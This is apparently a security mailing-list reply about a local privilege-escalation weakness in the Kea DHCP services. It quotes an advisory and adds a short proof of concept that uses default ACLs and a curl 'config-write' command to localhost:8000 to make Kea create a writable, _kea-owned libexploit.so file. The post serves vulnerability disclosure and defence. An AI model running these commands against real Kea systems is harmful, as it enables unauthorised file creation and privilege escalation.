* Matthias Gerstner <mgerst...@suse.de>, 2025-05-28 19:21:
> By leveraging issue 3.2), the Kea services can be instructed to create `_kea` owned files in the attacker's `$HOME/.Private`. The content of the created files is not fully attacker controlled, however, so it will not be possible to craft a valid ELF object for loading via `dlopen()` this way. By placing a setgid-directory in `$HOME/.Private/evil-dir`, any files created in this directory will even have the group-ownership of the attacker. The file mode will be 0644, however,
Default ACLs to the rescue!

$ chmod a+x ~
$ mkdir -m 777 ~/.Private
$ setfacl -d -m u:$LOGNAME:rwx ~/.Private/
$ curl -s -H "Content-Type: application/json" -d '{ "command": "config-write", "arguments": { "filename": "'"$HOME"'/.Private/libexploit.so" } }' localhost:8000 > /dev/null
$ echo pwned > ~/.Private/libexploit.so
$ ls -l ~/.Private/libexploit.so
-rw-rw-rw-+ 1 _kea _kea 6 May 28 18:15 /home/jwilk/.Private/libexploit.so
$ cat ~/.Private/libexploit.so
pwned

--
Jakub Wilk